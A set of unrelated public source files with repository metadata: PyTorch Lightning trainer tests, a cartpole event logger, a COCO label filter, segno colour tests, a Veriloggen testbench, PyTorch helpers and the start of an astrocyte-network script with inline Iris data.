14b05dbce16975b542d6409149a24a4079334f70 | 3b4f985759e44dc169134ae7dcee8e92747c4b01 | /tests/tests_app/components/multi_node/test_trainer.py | 249d7868652bb9800f69f27af8365d32b7063452 | [
"Apache-2.0"
] | permissive | SkafteNicki/pytorch-lightning | 4b09863bf222241ca7128d13df94ff60b71e50aa | 7df627b43746a85aa87671bec3e6dada0d98b556 | refs/heads/master | 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 | Apache-2.0 | 2023-07-10T02:40:24 | 2020-03-18T11:44:20 | Python | UTF-8 | Python | false | false | 3,538 | py | import os
from copy import deepcopy
from functools import partial
from unittest import mock
import pytest
from lightning_utilities.core.imports import module_available
from lightning_utilities.test.warning import no_warning_call
import pytorch_lightning as pl
from lightning.app.components.multi_node.trainer import _LightningTrainerRunExecutor
def dummy_callable(**kwargs):
t = pl.Trainer(**kwargs)
return t._all_passed_kwargs
def dummy_init(self, **kwargs):
self._all_passed_kwargs = kwargs
def _get_args_after_tracer_injection(**kwargs):
with mock.patch.object(pl.Trainer, "__init__", dummy_init):
ret_val = _LightningTrainerRunExecutor.run(
local_rank=0,
work_run=partial(dummy_callable, **kwargs),
main_address="1.2.3.4",
main_port=5,
node_rank=6,
num_nodes=7,
nprocs=8,
)
env_vars = deepcopy(os.environ)
return ret_val, env_vars
def check_lightning_pytorch_and_mps():
if module_available("pytorch_lightning"):
return pl.accelerators.MPSAccelerator.is_available()
return False
@pytest.mark.skipif(not check_lightning_pytorch_and_mps(), reason="pytorch_lightning and mps are required")
@pytest.mark.parametrize("accelerator_given,accelerator_expected", [("cpu", "cpu"), ("auto", "cpu"), ("gpu", "cpu")])
def test_trainer_run_executor_mps_forced_cpu(accelerator_given, accelerator_expected):
warning_str = (
r"Forcing accelerator=cpu as other accelerators \(specifically MPS\) are not supported "
+ "by PyTorch for distributed training on mps capable devices"
)
if accelerator_expected != accelerator_given:
warning_context = pytest.warns(UserWarning, match=warning_str)
else:
warning_context = no_warning_call(match=warning_str + "*")
with warning_context:
ret_val, env_vars = _get_args_after_tracer_injection(accelerator=accelerator_given)
assert ret_val["accelerator"] == accelerator_expected
@pytest.mark.parametrize(
"args_given,args_expected",
[
({"devices": 1, "num_nodes": 1, "accelerator": "gpu"}, {"devices": 8, "num_nodes": 7, "accelerator": "auto"}),
({"strategy": "ddp_spawn"}, {"strategy": "ddp"}),
({"strategy": "ddp_sharded_spawn"}, {"strategy": "ddp_sharded"}),
],
)
@pytest.mark.skipif(not module_available("torch"), reason="PyTorch is not available")
def test_trainer_run_executor_arguments_choices(
args_given: dict,
args_expected: dict,
):
if pl.accelerators.MPSAccelerator.is_available():
args_expected.pop("accelerator", None) # Cross platform tests -> MPS is tested separately
ret_val, env_vars = _get_args_after_tracer_injection(**args_given)
for k, v in args_expected.items():
assert ret_val[k] == v
assert env_vars["MASTER_ADDR"] == "1.2.3.4"
assert env_vars["MASTER_PORT"] == "5"
assert env_vars["GROUP_RANK"] == "6"
assert env_vars["RANK"] == str(0 + 6 * 8)
assert env_vars["LOCAL_RANK"] == "0"
assert env_vars["WORLD_SIZE"] == str(7 * 8)
assert env_vars["LOCAL_WORLD_SIZE"] == "8"
assert env_vars["TORCHELASTIC_RUN_ID"] == "1"
@pytest.mark.skipif(not module_available("lightning"), reason="lightning not available")
def test_trainer_run_executor_invalid_strategy_instances():
with pytest.raises(ValueError, match="DDP Spawned strategies aren't supported yet."):
_, _ = _get_args_after_tracer_injection(strategy=pl.strategies.DDPStrategy(start_method="spawn"))
| [
"[email protected]"
] | |
7c0f8ef2e5e76dd512f4593f86eb29756a26e302 | be6e1acc03149aee1ffbdaa315cf8b7d175fffe9 | /event_log.py | 6d347539f3034a82bf2d2298b62c74976e512faf | [
"MIT"
] | permissive | rebcabin/cartpoleplusplus | 763c22d41fc6f13b01a1519da3b51de91cfd03f7 | f986f495755369f571dcbb9a79d21680b916c0f4 | refs/heads/master | 2020-04-05T08:27:28.420983 | 2018-11-24T01:17:47 | 2018-11-24T01:17:47 | 156,716,591 | 0 | 0 | MIT | 2018-11-08T14:10:29 | 2018-11-08T14:10:28 | null | UTF-8 | Python | false | false | 6,521 | py | #!/usr/bin/env python
import event_pb2
import gzip
import matplotlib.pyplot as plt
import numpy as np
import StringIO
import struct
def rgb_to_png(rgb):
"""convert RGB data from render to png"""
sio = StringIO.StringIO()
plt.imsave(sio, rgb)
return sio.getvalue()
def png_to_rgb(png_bytes):
"""convert png (from rgb_to_png) to RGB"""
# note PNG is always RGBA so we need to slice off A
rgba = plt.imread(StringIO.StringIO(png_bytes))
return rgba[:,:,:3]
def read_state_from_event(event):
"""unpack state from event (i.e. inverse of add_state_to_event)"""
if len(event.state[0].render) > 0:
num_repeats = len(event.state)
num_cameras = len(event.state[0].render)
eg_render = event.state[0].render[0]
state = np.empty((eg_render.height, eg_render.width, 3,
num_cameras, num_repeats))
for r_idx in range(num_repeats):
repeat = event.state[r_idx]
for c_idx in range(num_cameras):
png_bytes = repeat.render[c_idx].png_bytes
state[:,:,:,c_idx,r_idx] = png_to_rgb(png_bytes)
else:
state = np.empty((len(event.state), 2, 7))
for i, s in enumerate(event.state):
state[i][0] = s.cart_pose
state[i][1] = s.pole_pose
return state
class EventLog(object):
def __init__(self, path, use_raw_pixels):
self.log_file = open(path, "ab")
self.episode_entry = None
self.use_raw_pixels = use_raw_pixels
def reset(self):
if self.episode_entry is not None:
# *sigh* have to frame these ourselves :/
# (a long as a header-len will do...)
buff = self.episode_entry.SerializeToString()
if len(buff) > 0:
buff_len = struct.pack('=l', len(buff))
self.log_file.write(buff_len)
self.log_file.write(buff)
self.log_file.flush()
self.episode_entry = event_pb2.Episode()
def add_state_to_event(self, state, event):
"""pack state into event"""
if self.use_raw_pixels:
# TODO: be nice to have pose info here too in the pixel case...
num_repeats = state.shape[4]
for r_idx in range(num_repeats):
s = event.state.add()
num_cameras = state.shape[3]
for c_idx in range(num_cameras):
render = s.render.add()
render.width = state.shape[1]
render.height = state.shape[0]
render.png_bytes = rgb_to_png(state[:,:,:,c_idx,r_idx])
else:
num_repeats = state.shape[0]
for r in range(num_repeats):
s = event.state.add()
s.cart_pose.extend(map(float, state[r][0]))
s.pole_pose.extend(map(float, state[r][1]))
def add(self, state, action, reward):
event = self.episode_entry.event.add()
self.add_state_to_event(state, event)
if isinstance(action, int):
event.action.append(action) # single action
else:
assert action.shape[0] == 1 # never log batch operations
event.action.extend(map(float, action[0]))
event.reward = reward
def add_just_state(self, state):
event = self.episode_entry.event.add()
self.add_state_to_event(state, event)
class EventLogReader(object):
def __init__(self, path):
if path.endswith(".gz"):
self.log_file = gzip.open(path, "rb")
else:
self.log_file = open(path, "rb")
def entries(self):
episode = event_pb2.Episode()
while True:
buff_len_bytes = self.log_file.read(4)
if len(buff_len_bytes) == 0: return
buff_len = struct.unpack('=l', buff_len_bytes)[0]
buff = self.log_file.read(buff_len)
episode.ParseFromString(buff)
yield episode
def make_dir(d):
if not os.path.exists(d):
os.makedirs(d)
if __name__ == "__main__":
import argparse, os, sys, Image, ImageDraw
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--log-file', type=str, default=None)
parser.add_argument('--echo', action='store_true', help="write event to stdout")
parser.add_argument('--episodes', type=str, default=None,
help="if set only process these specific episodes (comma separated list)")
parser.add_argument('--img-output-dir', type=str, default=None,
help="if set output all renders to this DIR/e_NUM/s_NUM.png")
parser.add_argument('--img-debug-overlay', action='store_true',
help="if set overlay image with debug info")
# TODO args for episode range
opts = parser.parse_args()
episode_whitelist = None
if opts.episodes is not None:
episode_whitelist = set(map(int, opts.episodes.split(",")))
if opts.img_output_dir is not None:
make_dir(opts.img_output_dir)
total_num_read_episodes = 0
total_num_read_events = 0
elr = EventLogReader(opts.log_file)
for episode_id, episode in enumerate(elr.entries()):
if episode_whitelist is not None and episode_id not in episode_whitelist:
continue
if opts.echo:
print "-----", episode_id
print episode
total_num_read_episodes += 1
total_num_read_events += len(episode.event)
if opts.img_output_dir is not None:
dir = "%s/ep_%05d" % (opts.img_output_dir, episode_id)
make_dir(dir)
make_dir(dir + "/c0") # HACK: assume only max two cameras
make_dir(dir + "/c1")
for event_id, event in enumerate(episode.event):
for state_id, state in enumerate(event.state):
for camera_id, render in enumerate(state.render):
assert camera_id in [0, 1], "fix hack above"
# open RGB png in an image canvas
img = Image.open(StringIO.StringIO(render.png_bytes))
if opts.img_debug_overlay:
canvas = ImageDraw.Draw(img)
# draw episode and event number in top left
canvas.text((0, 0), "%d %d" % (episode_id, event_id), fill="black")
# draw simple fx/fy representation in bottom right...
# a bounding box
bx, by, bw = 40, 40, 10
canvas.line((bx-bw,by-bw, bx+bw,by-bw, bx+bw,by+bw, bx-bw,by+bw, bx-bw,by-bw), fill="black")
# then a simple fx/fy line
fx, fy = event.action[0], event.action[1]
canvas.line((bx,by, bx+(fx*bw), by+(fy*bw)), fill="black")
# write it out
img = img.resize((200, 200))
filename = "%s/c%d/e%05d_r%d.png" % (dir, camera_id, event_id, state_id)
img.save(filename)
print >>sys.stderr, "read", total_num_read_episodes, "episodes for a total of", total_num_read_events, "events"
| [
"[email protected]"
] | |
9c0f49814adb26d4b6bde24af40fb90845ccac80 | d34da4a69ebef62d4b17b8b56f0eca72f0c021e4 | /traffic_sign/subset_coco.py | 4e117ea2e1cf5dff2b36cba086a24552a7c93498 | [] | no_license | gy20073/aws | 91c193e18a15ab4d20acf9d58078bda791b39c38 | 1d73ce215026b1baa91a359628c26edeb59a22ce | refs/heads/master | 2020-03-19T03:55:24.406320 | 2019-10-12T05:35:30 | 2019-10-12T05:35:30 | 135,775,172 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | import os
# for each label file, check whether stop sign in it.
# if do, then create new label file with only stop sign, in label dir, and add an entry of this image in the index file
subset="train2014"
label_path = "/scratch/yang/aws_data/coco/labels_bak/" + subset
out_path = "/scratch/yang/aws_data/coco/labels/" + subset
image_prefix = "/scratch/yang/aws_data/coco/images/" + subset
index_file = "/scratch/yang/aws_data/coco/filtered_" + subset + ".txt"
if not os.path.exists(out_path):
os.mkdir(out_path)
# 11 is stop sign
def filter_stop_sign(fname):
with open(fname, "r") as f:
lines = f.readlines()
out = []
for line in lines:
if line.startswith("11 "):
out.append("0 " + line[3:])
return out
def write_label(oname, filtered):
with open(oname, "w") as f:
for l in filtered:
f.write(l)
index = open(index_file, "w")
for file in os.listdir(label_path):
if file.endswith(".txt"):
filtered = filter_stop_sign(os.path.join(label_path, file))
if len(filtered) > 0:
# save the label
write_label(os.path.join(out_path, file), filtered)
# save the image name
index.write(os.path.join(image_prefix, file.replace(".txt", ".jpg")) + "\n")
index.close() | [
"[email protected]"
] | |
44b7e6b025a9917ce35e63a322c922264b4455b4 | 5922398212b6e113f416a54d37c2765d7d119bb0 | /python/O(1) Check Power of 2.py | d664954d5d2b872362cab07d682b5469322e34d5 | [] | no_license | CrazyCoder4Carrot/lintcode | e777f73e1fdfe3b8abc9dbfc07d26602bf614151 | 33dcd7f0e2d9bee58840a3370837cb2db82de1eb | refs/heads/master | 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | class Solution:
"""
@param n: An integer
@return: True or false
"""
def checkPowerOf2(self, n):
# write your code here
if n == 0:
return False
return n&(n-1) == 0 | [
"[email protected]"
] | |
a0df9ac05e88fad95bd93a42f58be9a0d2994745 | 35b45b5225f911072287b7f0888f4ef4cc70f3d9 | /tests/test_colors.py | 4b316eecdba5bf03008b0ff14ef89c60f50cc7d2 | [
"BSD-3-Clause"
] | permissive | heuer/segno | 54e9b583dbc33b016715bb13f97a9013a37cc9d4 | 11556378fa8949fa5ad6dddbf8cc5f4a667038af | refs/heads/master | 2023-06-21T02:01:45.620206 | 2023-05-02T22:09:31 | 2023-05-02T22:09:31 | 64,920,252 | 441 | 59 | BSD-3-Clause | 2023-06-15T05:00:05 | 2016-08-04T09:08:52 | Python | UTF-8 | Python | false | false | 8,562 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 - 2022 -- Lars Heuer
# All rights reserved.
#
# License: BSD License
#
"""\
Tests against the colors module.
"""
from __future__ import absolute_import, unicode_literals
import pytest
from segno import writers as colors
def test_illegal():
with pytest.raises(ValueError):
colors._color_to_rgb('unknown')
def test_illegal2():
with pytest.raises(ValueError):
colors._color_to_rgb((1, 2, 3, 256))
def test_illegal3():
with pytest.raises(ValueError):
colors._color_to_rgb((300, 300, 300))
def test_illegal4():
with pytest.raises(ValueError):
colors._color_to_rgb((0, 0, 256))
def test_illegal5():
with pytest.raises(ValueError):
colors._color_to_rgb((256, 0, 0))
def test_rgba_vs_rgb_conflict():
with pytest.raises(ValueError):
colors._color_to_rgb('#949494E8')
@pytest.mark.parametrize('clr, expected', [((0, 0, 0, 0), False),
((0, 0, 0, 1), True),
((0, 0, 0, 1.0), True),
((0, 0, 0, 255), True),
((0, 0, 0, 0.25), False),
('#000', True),
('#000000', True),
('Black', True),
('black', True),
('BLACK', True),
('blacK', True),
])
def test_color_is_black(clr, expected):
assert expected == colors._color_is_black(clr)
@pytest.mark.parametrize('clr, expected', (((255, 255, 255, 0), False),
((255, 255, 255, 1), True),
((255, 255, 255, 255), True),
((255, 255, 255, 1.0), True),
((255, 255, 255, .0), False),
((255, 255, 255, .25), False),
('#FFF', True),
('#fFF', True),
('#ffF', True),
('#fff', True),
('#ffffff', True),
('White', True),
('white', True),
('WHITE', True),
('whitE', True),
))
def test_color_is_white(clr, expected):
assert expected == colors._color_is_white(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
('WHite', '#fff'),
('#000000', '#000'),
('#ffFFff', '#fff'),
('#EEeeEE', '#eee'),
('#F00', 'red'),
('#FF0000', 'red'),
('red', 'red'),
('#d2b48c', 'tan'),
('tan', 'tan'),
((0, 0, 0, 1.0), '#000'),
((255, 255, 255, 1.0), '#fff'),
((255, 0, 0, 0.25), 'rgba(255,0,0,0.25)'),
('#0000ffcc', 'rgba(0,0,255,0.8)'),
('#949494E8', 'rgba(148,148,148,0.91)'),
))
def test_color_to_webcolor(clr, expected):
assert expected == colors._color_to_webcolor(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
('#F00', '#ff0000'),
('#FF0000', '#ff0000'),
('red', '#ff0000'),
('#D2B48C', '#d2b48c'),
((0, 0, 0, 1.0), '#000'),
((255, 255, 255, 1.0), '#fff'),
))
def test_color_to_webcolor_dont_optimize(clr, expected):
assert expected == colors._color_to_webcolor(clr, optimize=False)
def _make_valid_colornames_data():
data = (
('red', (255, 0, 0)),
('green', (0, 128, 0)),
('blue', (0, 0, 255)),
('Fuchsia', (255, 0, 255)),
('CoRnFloWeRblUe', (100, 149, 237)),
('hOtPink', (255, 105, 180)),
('darkSlateGrey', (47, 79, 79)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_colornames_data())
def test_valid_colornames(name, expected):
rgb = colors._color_to_rgb(name)
assert 3 == len(rgb)
assert expected == rgb
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
('#0000ffcc', (0, 0, 255, .8)),
('#949494E8', (148, 148, 148, 0.91)),
))
def test_hex_to_rgba(color, expected):
assert expected == colors._hex_to_rgb_or_rgba(color)
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
('#0000ffcc', (0, 0, 255, 204)),
('#949494E8', (148, 148, 148, 232)),
))
def test_hex_to_rgba_alpha_int(color, expected):
assert expected == colors._hex_to_rgb_or_rgba(color, alpha_float=False)
def _make_valid_hexcodes_rgb_data():
data = (
('#000', (0, 0, 0)),
('#FF1493', (255, 20, 147)),
('#FA8072', (250, 128, 114)),
('00F', (0, 0, 255)),
('#800000', (128, 0, 0)),
('#812dd3', (129, 45, 211)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgb_data())
def test_valid_hexcodes_rgb(name, expected):
rgb = colors._color_to_rgb(name)
assert 3 == len(rgb)
assert expected == rgb
def _make_valid_hexcodes_rgba_data():
data = (
('#808000', (128, 128, 0, 1.0)),
('red', (255, 0, 0, 1.0)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgba_data())
def test_valid_hexcodes_rgba(name, expected):
rgba = colors._color_to_rgba(name)
assert 4 == len(rgba)
assert expected == rgba
@pytest.mark.parametrize('t, expected', (
('#808000', (128, 128, 0, 1.0)),
('red', (255, 0, 0, 1.0)),
((255, 0, 0, .2), (255, 0, 0, .2)),
))
def test_tuple_to_rgba(t, expected):
rgba = colors._color_to_rgba(t)
assert expected == rgba
@pytest.mark.parametrize('t, expected', (
('#808000', (128, 128, 0, 255)),
('red', (255, 0, 0, 255)),
((0, 0, 255, .8), (0, 0, 255, 204)),
))
def test_tuple_to_rgba_int(t, expected):
rgba = colors._color_to_rgba(t, alpha_float=False)
assert expected == rgba
@pytest.mark.parametrize('color, expected', (
((0, 0, 0), (255, 255, 255)),
((255, 255, 255), (0, 0, 0)),
((123, 123, 123), (132, 132, 132)),
((60, 70, 80), (195, 185, 175)),
))
def test_invert_color(color, expected):
assert expected == colors._invert_color(color)
if __name__ == '__main__':
pytest.main([__file__])
| [
"[email protected]"
] | |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f | 1d9356626550004745bbc14de9a3308753afcea5 | /sample/tests/while/led.py | 2d6f9c7e92fa414d08993efca62d0115951efe0e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | hoangt/veriloggen | e916290aa15c63f03ec0ad8e9c8bdf183787fbe9 | 8e7bd1ff664a6d683c3b7b31084ff4d961c4c841 | refs/heads/master | 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import sys
import os
from veriloggen import *
def mkTest():
m = Module('test')
clk = m.Reg('CLK')
rst = m.Reg('RST')
count = m.Reg('count', width=32)
m.Initial(
Systask('dumpfile', 'uut.vcd'),
Systask('dumpvars', 0, clk, rst, count),
)
m.Initial(
clk(0),
Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
)
m.Initial(
rst(0),
Delay(100),
rst(1),
Delay(100),
rst(0),
Delay(1000),
count(0),
While(count < 1024)(
count( count + 1 ),
Event(Posedge(clk))
),
Systask('finish'),
)
return m
if __name__ == '__main__':
test = mkTest()
verilog = test.to_verilog('tmp.v')
print(verilog)
| [
"[email protected]"
] | |
3233cf987d1529f760bef548e7a959952c37b30f | 98e1155518b292341e60908d12233a2b130cb043 | /helpers.py | cabba2a794108cc9b151778f12f403862f7ef99b | [] | no_license | bkj/pbtnet | 5443a580e1bca91e4c293ae2be8bdefb85a44ce0 | e8c7b11be92e5ff9e4facccf908e87611b7f72bb | refs/heads/master | 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | #!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
if isinstance(x, Variable):
return to_numpy(x.data)
return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
np.random.seed(seed)
_ = torch.manual_seed(seed + 123)
_ = torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.shape[0], -1)
def ablate(x, p):
return x * Variable(torch.rand((1,) + x.shape[1:]).cuda() > p).float()
| [
"[email protected]"
] | |
90cb117fe81c46994501a28739c375f1f067da8f | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/mypybrain/angn.py | 2f5f9b3be43027253373cedda5b32243ca76c87d | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,739 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 14 17:48:37 2013
The activation function was the hyperbolic tangent in all the
layers, except in the output layer where the threshold function was
used with a threshold value of 0.5 and an expected binary output.
All layers have astrocytes
Weight limiting? Decision of neurons will never change
Modification of weights - input or output weights? Potential implied
method:
* Input astrocytes modify output weights
* Hidden astrocytes modify both input and output weights
* Output astrocytes modify input weights
associated neuronal connections were active for at least n out of m
iterations (n: 2 to 3; m: 4, 6, 8), and 2) considering the time unit as
a single iteration, astrocytic effects lasted 4 to 8 iterations, and the
neuronal connection weights gradually increased (25%) or
decreased (50%) if the associated astrocyte was active or inactive,
respectively.
The combinations (Astrocytic Sensitivity, Neuron-glia power
connection: 2,4; 3,6; 2,6 y 3,8) were determined by trial-and-error,
and allowed an upper limit of 3, 4, 5 or 6 astrocytic activations,
respectively.
@author: david
"""
import random
import datetime
import os
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from numpy import array, ones, zeros, append
import numpy as np
from astrocyte_layer import AstrocyteLayer
from plotting.plotters import plotPercentageErrorBar, plotPercentageNoErrorBar
from mymodules.threshold import ThresholdLayer
def createDS():
# taken from iris data set at machine learning repository
pat = [[[5.1, 3.5, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.0, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.1, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.6, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.7, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.4, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 2.9, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.3, 3.0, 1.1, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.8, 4.0, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 4.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.3, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.5, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 3.8, 1.7, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.5, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.7, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.7, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.6, 1.0, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.3, 1.7, 0.5], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.9, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.0, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.6, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.5, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.4, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.1, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 4.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 4.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.2, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 3.5, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.0, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.5, 2.3, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.6, 0.6], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.9, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.3, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.3, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[7.0, 3.2, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 3.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.9, 3.1, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.3, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.5, 2.8, 4.6, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.5, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 4.7, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[4.9, 2.4, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 2.9, 4.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.2, 2.7, 3.9, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.0, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.0, 4.2, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.2, 4.0, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.9, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.9, 3.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 4.1, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.5, 3.9, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.2, 4.8, 1.8], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.5, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.7, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 3.0, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.8, 2.8, 4.8, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.0, 5.0, 1.7], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.9, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.6, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.8, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.7, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 3.9, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.7, 5.1, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[5.4, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 3.4, 4.5, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.7, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.3, 4.4, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], 